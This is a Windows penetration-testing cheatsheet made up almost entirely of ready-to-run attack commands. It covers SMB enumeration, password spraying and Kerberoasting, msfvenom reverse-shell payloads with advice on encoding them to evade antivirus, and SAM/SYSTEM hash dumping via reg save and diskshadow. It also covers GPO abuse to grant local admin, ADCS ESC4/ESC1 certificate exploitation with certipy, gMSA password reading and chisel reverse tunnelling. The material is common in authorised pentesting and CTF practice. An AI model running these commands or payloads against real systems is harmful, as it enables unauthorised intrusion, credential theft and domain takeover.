Windows Pentesting Cheatsheet
General Reconnaissance
- Host Scanning (ping-sweep)
nmap -sn <IP/{subnet_mask}>
[Scans an IP range for alive hosts]
Example:
nmap -sn 10.0.0.0/24
[Scans all IPs from 10.0.0.1 - 10.0.0.254]
- Open Port Scanning
nmap --min-rate 4500 --max-rtt-timeout 1500ms <IP|Hostname> -p-
[Scans all ports on a given target (You can remove -p- to only scan the top 1000 ports)]
- Service Scanning
nmap --min-rate 4500 --max-rtt-timeout 1500ms <IP|Hostname> -p- -sV
[Scans all ports and then attempts to find the services running on open ports]
The
-Pnflag may be required when scanning Windows hosts if they fail to respond to pings
FTP and SMB
FTP Anonymous Login
FTP (File Transfer Protocol) is used for allowing authorised users to transfer files between locations without the need for physical media. However, most FTP servers allow for the option of “anonymous login”. This means that a user named “anonymous” can access files on the FTP server without the need for a password.
This can be done using the command: ftp anonymous@<IP|Hostname>
Anonymous login on FTP servers can be detected using NMAP:
nmap -p <FTP_Port_usually_21> --script ftp-anon <IP|Hostname>
SMB Enumeration
SMB is commonly used for network file shares allowing users to access files within a named share across a network. They can also be publically accessible across the internet if it is configured to be that way.
Sometimes, if misconfigured, and SMB server may allow “null logins”, this is where a client is able to authorise without the use of a username or password. This can be a vulnerability as it may allow an attacker to see what file shares are available, and possibly read from or write to shares.
NMAP can be used to check for null logins and enumerate file shares on an SMB server:
nmap -p <SMB_Port_usually_445/139> --script smb-os-fingerprint,smb-enum-shares <IP|Hostname>
SMBMap
SMBMap is a tool used for enumerating samba (SMB) shares. It has very simply syntax.
smbmap -H <IP|Hostname>
[Attempts to enumerate shares on a given host]
smbmap -H <IP|Hostname> -u <username> -p <password|NTLM_Hash>
[Attempts to enumerate shares on a given host using a username and password for authentication]
SMBClient
SMBClient is an FTP-like client used for accessing SMB shares.
Basic Usage:
smbclient //<IP|Hostname>/<share>
[Attempts to authenticate without username or password]
smbclient //<IP|Hostname>/<share> -U <username>
[Attempts to authenticate with just a username]
smbclient //<IP|Hostname>/<share> -U <username> --password=<password>
[Attempts to authenticate with a given username and password]
NXC SMB Share Listing
nxc smb -u '<USERNAME>' -p '<PASSWORD>' --shares <DOMAIN/IP>
NXC SMB RID Bruteforcing
This only works if the default share IPC$ has READ access. It is used to enumerate valid domain accounts.
nxc smb -u '<USERNAME>' -p '<PASSWORD>' --rid-brute <DOMAIN/IP>
You can strip the output to only get SidTypeUser accounts.
nxc smb -u '<USERNAME>' -p '<PASSWORD>' --rid-brute <DOMAIN/IP> | grep SidTypeUser | cut -d: -f2 | cut -d \\ -f2 | cut -d' ' -f1 > users.lst
NXC Password Spraying
nxc smb -u ./users.lst -p '<PASSWORD>' --continue-on-success <DOMAIN/IP>
NXC Get User Account Information
nxc smb -u '<USERNAME>' -p '<PASSWORD>' --users <DOMAIN/IP>
Enumerate Potential Usernames with Kerbrute:
kerbrute userenum --dc <DOMAIN_CONTROLLER_IP> -d <DOMAIN> <USERNAME_LIST> | grep "VALID USERNAME" | awk '{print $NF}'
[Prints the format: <USERNAME>@<domain>]
kerbrute userenum --dc <DOMAIN_CONTROLLER_IP> -d <DOMAIN> <USERNAME_LIST> | grep "VALID USERNAME" | awk '{print $NF}' | cut -d@ -f1
[Prints just the username: <USERNAME>]
Password Spray (One Password Multiple Users) with Kerbrute:
kerbrute passwordspray --dc <DC-IP> -d <DOMAIN> <USERNAME_LIST> '<PASSWORD>'
Bloodhound Data Collection
You may have valid domain credentials but no access to a machine
bloodhound-python -c All -u '<USERNAME>' -p '<PASSWORD>' -d <DOMAIN>
You may have to provide a name server:
bloodhound-python -c All -u '<USERNAME>' -p '<PASSWORD>' -d <DOMAIN> -ns <DC-IP>
Kerberoasting
Impacket-GetNPUsers
This will return a hash for a user account if the account does not require preauth
impacket-GetNPUsers -dc-ip <DC-IP> -usersfile <USERNAME_LIST> <DOMAIN>/
Impacket-GetUserSPNs
This is generally used against service accounts that have an SPN set, to get a hash that may be crackable offline
impacket-GetUserSPNs <domain>/<username>:<password>@<domain>
If you have no password, but you do have the NTLM hash, you can perform a pass-the-hash attack.
impacket-GetUserSPNs <domain>/<username> -hashes <NT_HASH>:<NT_HASH>
If you have used Impacket’s GetNPUsers and got a hash for an account that does not have preauth required but you cannot crack the hash, you can still attempt to get SPNs by using the --no-preauth flag.
impacket-GetUserSPNs <domain>/<username>@<domain> --no-preauth
Read GMSA Password:
bloodyAD --host "<DC-IP>" -d "<DOMAIN>" -u "<USERNAME>" -p "<PASSWORD>" get object $TargetObject --attr msDS-ManagedPassword
Bruteforcing
Service Bruteforce:
hydra -l '<TARGET_USERNAME>' -P /usr/share/wordlists/rockyou.txt <SERVICE>://<TARGET_IP>
hydra -L '<USERNAME_LIST>' -P /usr/share/wordlists/rockyou.txt <SERVICE>://<TARGET_IP>
SUPPORTED SERVICES: SSH, FTP, RDP, VNC, SMB, POP3, TELNET
Generating Payloads for Windows Hosts
Msfvenom
You can use msfvenom to quickly generate a multitude of payload types.
Including meterpreter shells which you can use to take advantage of metasploit modules within a compromised machine.
msfvenom --list all
[Used to list the available modules (payload, encoders, etc.)]
msfvenom -p <payload_type> LHOST=<Listener_IP|Hostname|Domain> LPORT=<Listener_Port> -f <output_format> -o <output_name>
[General msfvenom command template]
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Listener_IP> LPORT=<Listener_Port> -f exe -o payload.exe
[Generates a meterpreter shell for Windows (64-bit) in an EXE format]
You can use the '-e' argument and supply an encoder type to encode the payload, this can help prevent detection by AV (anti-virus) software.
- Setting up a listener
If you are using a meterpreter payload, you should setup a listener, before deploying the payload, using msfconsole.
Commands to run:
- msfconsole
- use exploit/multi/handler
- set PAYLOAD <payload_type_used>
- set LHOST <Listener_IP_used>
- set LPORT <Listener_Port_used>
- run
If the listener fails to start correctly, you should check that you are attempting to listen on the correct IP (LHOST).
Another issue could be that if you are attempting to listen on a port below 1024, these are considered “privileged ports”. You should run msfconsole with administrative permissions (using sudo).
Privilege Escalation
Check User Privileges
whoami /priv
Backup SAM and SYSTEM Files (SeBackupPrivilege REQUIRED):
Option 1
reg save hklm\system C:/temp/system
reg save hklm\sam C:/temp/sam
Download the files and extract the hashes.
Option 2
Create a file with the content:
set context persistent nowriters
add volume c: alias test
create
expose %test% z:
Upload this file to the temp directory on the target. Run the command:
diskshadow /s <filename>
Now use robocopy to copy the files to the temp directory:
robocopy /b Z:\Windows\System32\Config C:\temp SAM
robocopy /b Z:\Windows\System32\Config C:\temp SYSTEM
Download the files to your local machine to extract the hashes.
Dump User Hashes From SAM and SYSTEM:
impacket-secretsdump -system SYSTEM -sam SAM LOCAL
“Group Policy Creator Owners” Group Abuse
The Group Policy Creator Owners group lets its members create new GPOs. However, those members can only edit or delete GPOs that they have created. This group privilege can be abused by creating a new GPO to add a taregt user to the local administrators group, and then forcing an GPO update.
1 - Find out if the user is in the group
whoami /all
[SNIPPED]
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================ ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
hackme\Desktop Admins Group S-1-5-21-2386970044-1145388522-2932701813-1121 Mandatory group, Enabled by default, Enabled group
hackme\Group Policy Creator Owners Group S-1-5-21-2386970044-1145388522-2932701813-520 Mandatory group, Enabled by default, Enabled group
[SNIPPED]
2 - Drop SharpGPOAbuse.exe on the target machine, or use Invoke-SharpGPOAbuse
3 - Run the commands:
New-GPO -Name "totallyLegitGPO"
New-GPLink -Name "totallyLegitGPO" -Target "OU=Domain Controllers,DC=hackme,DC=local"
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount <TARGET_USER> --GPOName totallyLegitGPO
4 - Force a GPO update
gpupdate /force
After performing these steps, run whoami /groups to check if the target user has been added to the local administrators group.
It may take a few minutes to work.
Get Passwords From PS .xml Creds File:
$Credential = Import-Clixml -Path "<xml_file>"
$Credential.GetNetworkCredential().password
Get Individual AD Computer IP:
$ComputerName = "<MACHINE>"
(Get-ADComputer $ComputerName -Properties IPv4Address).IPv4Address
List all AD Computers and IPs:
Get-ADComputer -Filter * -Properties IPv4Address | select name,IPV4Address
Enumerate System Patches:
wmic qfe get Caption,Description,HotFixID,InstalledOn
ADCS
ADCS Certificate Exploits:
ESC4:
Collect vulnerable certificate templates
certipy find -u "<OWNED_USER>" -p "<PASSWORD>" -dc-ip "<DC_IP>" -vulnerable -enabled -stdout
Make template vuln to ESC1
certipy template -username <OWNED_USER@DOMAIN> -password <PASSWORD> -target-ip <DC_IP> -template '<TEMPLATE_NAME>' -save-old
Exploit ESC1
certipy req -username <OWNED_USER@DOMAIN> -password <PASSWORD> -target-ip <DC> -ca <CERTIFICATE_CA> -template '<TEMPLATE_NAME>' -upn administrator@corp.local
Restore config
certipy template -username <OWNED_USER@DOMAIN> -password <PASSWORD> -target-ip <DC_IP> -template '<TEMPLATE_NAME>' -configuration <BACKED_UP_CERT>.json
Get hash for administrator
certipy auth -pfx administrator.pfx
Windows Priv-Esc with Meterpreter Shell:
Using the current meterpreter shell, run the command “background” to background the session.
Get the session number using the command “sessions”.
Use the post-exploitation module named “multi/recon/local_exploit_suggester” with the command “use multi/recon/local_exploit_suggester”.
Set the session using “set SESSION <session_number>”.
Run the exploit suggestor using “run”.
Choose an exploit that is found to be vulnerable by copying the exploit path and type “use <exploit_path>”.
Set the correct options using “SHOW OPTIONS” and then “set <OPTION_NAME> <value>”.
Run the exploit using “exploit”.
Tunneling
Chisel Tunneling:
Attacker: [./chisel<.exe> server -p <port to listen on> --reverse]
Target: [./chisel.exe client <listener_ip>:<listener_port> R:<port_to_open_on_attacker_machine>:<target_ip>:<target_port>]